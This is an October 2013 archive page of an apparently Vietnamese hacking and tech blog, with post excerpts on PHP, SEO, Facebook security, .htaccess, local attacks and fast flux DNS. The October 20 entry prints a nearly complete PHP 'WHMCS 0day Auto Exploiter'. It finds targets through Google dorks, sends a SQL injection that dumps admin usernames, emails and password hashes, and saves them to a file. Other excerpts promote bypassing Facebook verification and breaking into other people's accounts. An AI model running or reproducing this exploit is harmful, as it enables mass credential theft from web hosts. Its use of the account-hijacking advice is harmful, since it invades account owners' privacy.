Thursday, October 31, 2013

Tối ưu và tăng tốc xử lý khi lập trình PHP không chỉ giúp website chạy ổn định mà còn giúp tiết kiệm tài nguyên xử lý của máy chủ website.

Khi học và làm việc với PHP lần đầu, đa phần các lập trình viên đều có xu hướng học lướt các kiến thức căn bản để tập trung vào phần viết ứng dụng. Cũng chính vì lý do đó mà phần lớn những điểm nhấn quan trọng trong PHP thường là sẽ bị bỏ qua.

Bài viết này, với mong muốn tổng hợp và đưa đến cái nhìn bao quát, đầy đủ trong lập trình PHP. Qua đó giúp các bạn có cái nhìn đầy đủ và hiểu sâu các vấn đề hơn.


Thủ thuật tối ưu hóa khi lập trình PHP

Tuesday, October 29, 2013

Okay so i am gonna show you guys a little trick to bypass the Facebook Verification (Verify Images).


How to bypass Facebook photo tag verification or identify photos of your friends

Friday, October 25, 2013

Một tiện ích không thể thiếu. Cung cấp cho bạn những thông tin cơ bản như PR, số lượng index, rank alexa, tuổi đời domain, backlink mạng xã hội, internal link và external link.
Đặc biệt phiên bản mới cung cấp phân tích tổng thể ( Diagnosis ), cho bạn các thông số cực kỳ cần thiết như title, description, các thẻ H1, H2 … Một công cụ tuyệt vời thay thế cho ( giờ đã thu phí )


Những add-on hỗ trợ SEO website

Thực ra thì mình thấy có khá nhiều bài viết về bảo mật tài khoản trên mạng xã hội rồi (đặc biệt là Facebook), nên bài viết này Juno_okyo sẽ viết và chia sẻ theo kinh nghiệm cá nhân.

1. Sử dụng Mật khẩu mạnh
Một mật khẩu mạnh:
  • Có ít nhất 15 kí tự;
  • Có chữ hoa;
  • Có chữ thường;
  • Có chữ số;
  • Có kí tự như: ` ! " ? $ ? % ^ & * ( ) _ - + = { [ } ] : ; @ ' ~ # | \ < , > . ? /
  • Không giống như mật khẩu trước đó của bạn (trường hợp đổi mật khẩu).
  • Không phải là tên của bạn.
  • Không phải là tên đăng nhập.
  • Không phải là tên bạn bè của bạn.
  • Không phải là tên thành viên trong gia đình bạn.
  • Không phải là một từ trong từ điển.
  • Không phải là một tên chung.
  • Không phải là một mẫu trên bàn phím kiểu như: qwerty, asdfghjkl, or 12345678.
Nếu "quá khó" để nghĩ ra một mật khẩu đủ mạnh và tuân theo các quy tắc an toàn trên, bạn có thể sử dụng các công cụ tạo mật khẩu mạnh ngẫu nhiên như

Hướng dẫn bảo mật tài khoản Facebook

Thursday, October 24, 2013
1. .htaccess là gì?

1.1. .htaccess là gì

.htaccess là một file cấu hình sử dụng cho các web server chạy Apache. .htaccess dùng để thiết lập các tùy chọn: thực thi hay loại bỏ các chức năng, tính năng của Apache


Một số cấu hình trên file .htaccess

I. Khái niệm chung

  • Thông thường, khi host một site lên server thì người dùng sẽ được cấp một tài khoản người dùng và một thư mục để quản lý site của mình. Ví dụ tài khoản user1 được cấp thư mục /home/user1 để quản lý site của user1. Tương tự như vậy, tài khoản user2 được cấp thư mục /home/user2 để quản lý site của user2. Bằng cách nào đó, hacker có thể chiếm giữ /home/user2 và dùng các script (shell) để truy nhập vào /home/user1. Cách thức tấn công dựa vào các script ở site của user này để tấn công vào site của user khác trên cùng một server được gọi là Local Attack.


Tìm hiểu về Local Attack

I. Khái niệm

- Fast flux DNS là một kĩ thuật các botnet sử dụng để che giấu các trang web lừa đảo, có mã độc phía sau một mạng các máy tính bị kiểm soát đóng vai trò là proxy. Những máy tính trong mạng này có các bản ghi DNS thay đổi rất nhanh, một số trường hợp chỉ trong vòng vài phút. Cơ cấu thay đổi bản ghi DNS nhanh chóng này khiến việc tìm ra và chặn đứng các hoạt động bất hợp pháp trở nên khó khăn hơn nhiều.

- Fast flux DNS được nhận biết vào tháng 11/2006 nhưng đến tháng 7/2007 mới bắt đầu gây được sự chú ý.


Fast flux DNS

Wednesday, October 23, 2013

Những lời đồn đại về việc tăng tính bảo mật cho mạng WiFi mà ta nên gạt bỏ ngay từ bây giờ.

Đi cùng với sự tiếp nhận mạnh mẽ của cộng đồng và các hãng sản xuất phần cứng đối với công nghệ Wifi, các công nghệ bảo mật đi kèm với chuẩn mạng không dây này cũng theo đó mà ngày càng phát triển.

Vào những ngày đầu khi mà Wifi còn mới chập chững bước vào thị trường, ta có thể dễ dàng bắt gặp mẹo và nhiều khuyến cáo về bảo mật từ các nguồn tin không chính thức trên mạng Internet.

Các lầm tưởng thường gặp về bảo mật WiFi

Monday, October 21, 2013

[Image 01]

Video sử dụng làm demo trong bài viết này:
Cách 1:
Các bạn có thể bypass bằng cách sửa lại URL theo cấu trúc sau:
Ví dụ:
Tức là các bạn thay đoạn watch?v= thành v/.


How to bypass age restriction on Youtube?

Sunday, October 20, 2013

Có đứa bạn nhờ check site này:

Mã nguồn thì IPB, mà mình thì chưa chơi với mã nguồn này bao giờ cả =.=

Sau khi tìm đủ các dork trên Google để kiếm exp thì ngán. Quay sang phương án Local.

Let's go!


How to check

WHMCS 0day Auto Exploiter <= 5.2.8
Coded by g00n - Skype: t3hg00n
In action:

ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');
function letItBy(){ ob_flush(); flush(); }
function getAlexa($url)
$xml = simplexml_load_file(''.$url);
$rank1 = $xml->SD[1];
$rank = $rank1->POPULARITY->attributes()->TEXT;
$rank = 0;
return $rank;

function google_that($query, $page=1)
$start = $page*$resultPerPage;
$url = "{$resultPerPage}&start={$start}&q=" . urlencode($query);
$resultFromGoogle = json_decode( http_get($url, true) ,true);
if(isset($resultFromGoogle['responseStatus'])) {
if($resultFromGoogle['responseStatus'] != '200') return false;
if(sizeof($resultFromGoogle['responseData']['results']) == 0) return false;
else return $resultFromGoogle['responseData']['results'];
die('The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . $url );

function http_get($url, $safemode = false){
if($safemode === true) sleep(1);
$im = curl_init($url);
curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($im, CURLOPT_HEADER, 0);
return curl_exec($im);

function check_vuln($url) {
$url = dirname($url) . '/viewticket.php';
$url = str_replace("/admin","",$url);

$post = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT GROUP_CONCAT(0x3a3a3a3a3a,id,0x3a,username,0x3a,email,0x3a,password,0x3a3a3a3a3a) FROM tbladmins),0,0,0,0,0,0,0,0,0,0,0#";
$curl_connection = curl_init($url);
if($curl_connection != false) {
curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post);
$source = curl_exec($curl_connection);
if($infoz[0]) {
return $infoz[0];
return "Fail!";
return "Fail!";
<title>WHMCS Auto Xploiter - by g00n</title>
<body style="background-image: url(''); background-repeat: repeat; background-position: center; background-attachment: fixed;">

textarea{background-color:#105700;color:lime;font-weight:bold;font-size: 20px;font-family: Tahoma; border: 1px solid #000000;}
input{FONT-WEIGHT:normal;background-color: #105700;font-size: 15px;font-weight:bold;color: lime; font-family: Tahoma; border: 1px solid #666666;height:20}
body {
font-family: Tahoma
tr {
BORDER: dashed 1px #333;
color: #FFF;
td {
BORDER: dashed 1px #333;
color: #FFF;
.table1 {
BORDER: 0px Black;
color: #FFF;
.td1 {
BORDER: 0px;
BORDER-COLOR: #333333;
font: 7pt Verdana;
color: Green;
.tr1 {
BORDER: 0px;
BORDER-COLOR: #333333;
color: #FFF;
table {
BORDER: dashed 1px #333;
BORDER-COLOR: #333333;
color: #FFF;
input {
border : dashed 1px;
border-color : #333;
font: 8pt Verdana;
color: Red;
select {
BORDER-RIGHT: Black 1px solid;
BORDER-TOP: #DF0000 1px solid;
BORDER-LEFT: #DF0000 1px solid;
BORDER-BOTTOM: Black 1px solid;
BORDER-color: #FFF;
font: 8pt Verdana;
color: Red;
submit {
BORDER: buttonhighlight 2px outset;
width: 30%;
color: #FFF;
textarea {
border : dashed 1px #333;
font: Fixedsys bold;
color: #999;
margin: 1px;
color: Red;
background-color: Black;
.main {
margin : -287px 0px 0px -490px;
BORDER: dashed 1px #333;
BORDER-COLOR: #333333;
.tt {
background-color: Black;

A:link {
A:visited {
A:hover {
color: Red; TEXT-DECORATION: none
A:active {
color: Red; TEXT-DECORATION: none

#result span{display:block;}
#result .Y{background-color:green;}
#result .X{background-color:red;}
<script language=\'javascript\'>
function hide_div(id)
document.getElementById(id).style.display = \'none\';
function show_div(id)
document.getElementById(id).style.display = \'block\';
function change_divst(id)
if (document.getElementById(id).style.display == \'none\')
<link rel="stylesheet" type="text/css" href="">
body {
font-family: 'Audiowide', serif;
font-size: 30px;


<body onLoad="type_text()" ; bgColor=#000000 text=#00FFFF background="Fashion fuchsia">
<font face="Audiowide" color="red">WHMCS Auto Xploiter <font color="green">(0day)</font>
<font color="white" size="4">[For WHMCS ver. <= </font><font color="green" size="4">5.2.8</font><font color="white" size="4">]</font>

<table border=1 bordercolor=red>
<td width="700">
<br />
<form method="post">
Google Dork:   
<input type="text" id="dork" size="30" name="dork" value="<?php echo (isset($_POST['dork']{0})) ? htmlentities($_POST['dork']) : 'inurl:submitticket.php'; ?>" />
  <input type="submit" value="Xploit!" id="button"/>
if(isset($_POST['dork']{0})) {
$file = fopen("WMCS-Hashes.txt","a");
echo '<br /><div id="result"><b>Scanning has been started... Good luck! ;)</b><br><br>';
for($googlePage = 1; $googlePage <= 50; $googlePage++) {
$googleResult = google_that($_POST['dork'], $googlePage);
if(!$googleResult) {
echo 'Finished scanning.';

for($victim = 0; $victim < sizeof($googleResult); $victim++){
$result = check_vuln($googleResult[$victim]['unescapedUrl']);
$alexa = getAlexa($googleResult[$victim]['unescapedUrl']);
if($result != "Fail!") {
$hashes = "";
foreach ($result as $record) {
$hashes = $hashes . str_replace(':::::','',$record) . "\n";
$sep = "========================================================\n";
$data = $sep . $googleResult[$victim]['unescapedUrl'] . " - Alexa: " .$alexa. "\n" . $sep . $hashes . "\n";
echo "<br /><font color=\"green\">Successfully Xploited...</font>";
echo '<span class="Y">';
echo "<pre>" . $data . "</pre></span><br />";

else {
echo '<span class="X">';
echo "<a href=\"{$googleResult[$victim]['unescapedUrl']}\" target='_blank'>{$googleResult[$victim]['titleNoFormatting']}</a> - <font color=\"black\">Failed!</font>";
echo "</span>\n<br />";
echo '</div>';
<br /><br />
<font face="Audiowide" color="red" size="2">
Coded by: <font color="white">g00n</font> <font color="white">|</font> Skype: <font color="white"><a href="Skype:t3hg00n">t3hg00n</a></font><br /><br />
<br > <font color="green">For more tools/scripts/exploits/etc.</font>
<br />visit <a href="" target="_blank" style="text-decoration: none;"></a>



[PHP] WHMCS 0-day Auto Exploiter <= 5.2.8

Download Tutorial:
Tutorial by Mr.P1n3.

[Mr.P1n3] How I checked

Ngày 15/01/2013 vừa qua HVA đã tổ chức thành công chương trình hội thảo An toàn thông tin thường niên Tetcon 2013.

Hội thảo Tetcon năm nay thành công rực rỡ là vì có sự đóng góp rất lớn từ những bài tham luận vô cùng tuyệt vời của các diễn giả có nhiều năm kinh nghiệm trong ngành An toàn thông tin.

Nhằm giúp các thành viên HVA yêu thích An toàn thông tin nhưng không có cơ hội tham gia coi trực tiếp và trao đổi trực tiếp với các diễn giả tuyệt vời của Tetcon 2013 có thể tham khảo một phần của các bài tham luận này. HVA News trân trọng cung cấp video clip quay lại các bài tham luận của Tetcon 2013.


Hội thảo Tetcon 2013 Video Clip

Saturday, October 19, 2013

Trong mấy ngày gần đây đang có trao phong trào đăng status với nút Reply, tính năng trả lời theo từng bình luận này tất nhiên không còn xa lạ gì với những bạn nào làm admin tại các Fan Page, nhưng đối với một tài khoản Facebook cá nhân thì sẽ gây sự chú ý đúng không nào!

Hướng dẫn đăng status có reply (trả lời theo từng bình luận) trên Facebook

Những triệu chứng chỉ xuất hiện trong kỷ nguyên công nghệ là mặt trái của sự hiện đại và Internet đối với đời sống của con người.
Công nghệ hiện đại thực sự đã thay đổi cuộc sống của chúng ta bằng cách mang lại những trải nghiệm mới mẻ, tiện ích và nhanh hơn. Thế nhưng, không có điều gì là hoàn hảo, mặc dù lợi ích đã lấn át đi một số điểm trừ mang lại, công nghệ cũng đã khai sinh ra không ít những “căn bệnh” mà con người có thể đang mắc phải mà không hề hay biết.


Những "căn bệnh" con người có thể mắc phải từ công nghệ

Wednesday, October 16, 2013

Khi sáng lập mạng xã hội Facebook, Mark Zuckerberg đã rất thành công khi đưa vào nút like để thăm dò thái độ tiếp cận của dân cư mạng. Tuy nhiên, hành xử như thế nào để được “like”.

Nếu như sự vĩ đại của Bill Gates ở chỗ ông dự đoán được tương lai tất cả mọi người đều có máy tính, Steve Jobs thành danh với thương hiệu Apple, thì hiệu quả của Mark Zuckerberg đơn giản hơn rất nhiều: chỉ là một nút like!

Những “con chuột” trên Facebook

Monday, October 14, 2013

In December 2012, Facebook announced a slew of privacy changes, one of which - the axing of the "Who can look up my timeline by name" feature - annoyed privacy aficionados.

The feature controlled whether someone could be found by typing their name into the Facebook search bar.
The setting was limited in scope and didn't keep people from being found in other ways across the site, Facebook said at the time.

Facebook yanked the setting last year for people who weren't using it.
For the minority of users still using the setting, the plug is now being pulled.


Facebook's "Who can look up your timeline by name" privacy tool bites the dust

Wednesday, October 9, 2013
Chào các bạn!
Trong bài viết này mình sẽ hướng dẫn các bạn tạo một file cài đặt đơn giản sử dụng chức năng tạo file nén tự bung của WinRAR. Qua bài viết này, các bạn có thể tự tạo một file cài đặt đối với những chương trình nhỏ hoặc đóng gói một phần mềm Portable chẳng hạn ^^


Hướng dẫn tạo file cài đặt đơn giản với WinRAR

Tuesday, October 8, 2013

Microsoft’s risk and impact graph showing an aggregate view of October’s Severity and Exploitability Index.
(Credit: Microsoft
In its security update for this month, Microsoft has patched a critical Internet Explorer vulnerability that possibly exposed users to malware and hacks for the last three months.


Microsoft finally fixes critical Internet Explorer vulnerability

Bạn có bao giờ tự nhìn lại mình rằng bạn đang dùng Facebook như thể một đứa trẻ hét lên "Có ai quan tâm tới tôi không?"


Có phải chúng ta đang sống như một đứa trẻ trên Facebook?

MediaFire là một trang web chia sẻ dữ liệu miễn phí và không giới hạn, có trụ sở tại Harris County, Texas, Hoa Kỳ. Tất cả các thành viên đăng ký đều có thể sử dụng đầy đủ chức năng của MediaFire. Khi đăng kí một tài khoản (miễn phí) tại MediaFire, bạn sẽ có 50 GB để lưu trữ.

Trong bài viết này, mình sẽ hướng các bạn cách kiếm thêm dung lượng lưu trữ miễn phí.


Hướng dẫn kiếm thêm dung lượng lưu trữ cho tài khoản MediaFire

A group of pro-Palestinian hackers aligned with Anonymous has successfully hacked a range of websites including WhatsApp, AVG and Alexa.

KDMS Team Hacked Avira Website
The message appearing on the Avira website having been compromised by the pro-Palestinian Kdms Team of hackers. (Twitter)
Over the past 24 hours a group calling themselves Kdms Team has claimed responsibility for hacking six different websites, including the homepages of the hugely popular messaging service WhatsApp and the top free anti-virus provider AVG.


WhatsApp, AVG and Alexa Hacked by Pro-Palestinian Kdms Team Hackers

Sunday, October 6, 2013

Web Hosting software WHMCS vulnerable to SQL Injection

WHMCS, a popular client management, billing and support application for Web hosting providers, released an emergency security update for the 5.2 and 5.1 minor releases, to patch a critical vulnerability that was publicly disclosed.

Web Hosting software WHMCS vulnerable to SQL Injection; emergency security update released

Friday, October 4, 2013

HTML Web Programming and Designing

HTML (Hyper Text Markup Language) is the web Programming language the most most most useful and useable Web Programming language, Programmer, hacker, developer everyone need to learn HTML. HTML is the Source and Base of all Web Programming languages, If you don't know HTML then you can't learn any Web Programming lang. 

[eBook] HTML and PHP Tutorials

Google is the Proclaimed king among all search engines present on the internet. Among all the web based search engines, Google stands out because of its high speed and simplicity.
Unknown Google tricks
Everyone is familiar with the web applications provided by Google. Some of these are the Gmail, Google Drive, Google app store and a lot more. But little do people know about some very handy tricks that come along with this impeccable search engine.

Top 10 Unknown Google tricks

thu thuat google search

Thủ thuật cho Google thì rất nhiều nhưng ở đây mình xin chia sẻ một số thủ thuật mình hay áp dụng trong quá trình tìm kiếm content để anh em tham khảo.

1. Loại bỏ một từ

Bạn muốn tìm kiếm một cụm từ A, nhưng bạn không muốn hiển thị các kết quả có từ B hãy sử dụng dấu “-”
VD: marketing online -seo
Trong ví dụ bên trên mình tìm kiếm các bài viết liên quan đến marketing online, nhưng không muốn hiển thị các bài viết về SEO.

Một số thủ thuật Google Search có thể bạn chưa biết

In today world most of people using internet. Some of them having high speed internet connection also some peoples don't have high speed internet connection. Speed internet connections also may go slow sometimes. Its just because that your computer settings may have to be changed for the speed connection. We can able to speed up the internet connection by simply with help of command prompt. 


How to Speed Up Internet using Command Prompt

Facebook Updates Graph Search

Facebook Graph Search is more powerful than ever, has been updated to allow people to search in greater depth on Facebook.
Facebook expanded its Graph Search to include posts and status updates, which means everything you’ve been posting is way easier to find than ever before.


Facebook Graph Search becomes more powerful than ever, Review your Privacy Settings again

Ever since I had been problems constantly having to deal with Facebook leaving me out off people's accounts I began to think that I should write over my experiences to help others.

I will go over specific techniques and ideas to eventually grant you entrance to their accounts without having to deal with that Facebook problem having logging in from different location.

1st. Before you even begin reading this, you must already have their passwords or e-mails. If not, I will tell you a few ideas of how to acquire them.


Bypass Facebook Security Jacking Method

Thursday, October 3, 2013

A Rootkit virus is a stealth type of malware that is designed to hide the existence of certain processes or programs on your computer from regular detection methods, so as to allow it or another malicious process privileged access to your computer. Sometimes a rootkit may even fool your antivirus software and avoid being detected. It is at such times, that you may need to take help of special Rootkit Remover or Removal Tools.

Rootkit Remover

Here is a list of a few Rootkit Removers, most of which we have already covered on this site.


List of Free Rootkit Remover software for Windows

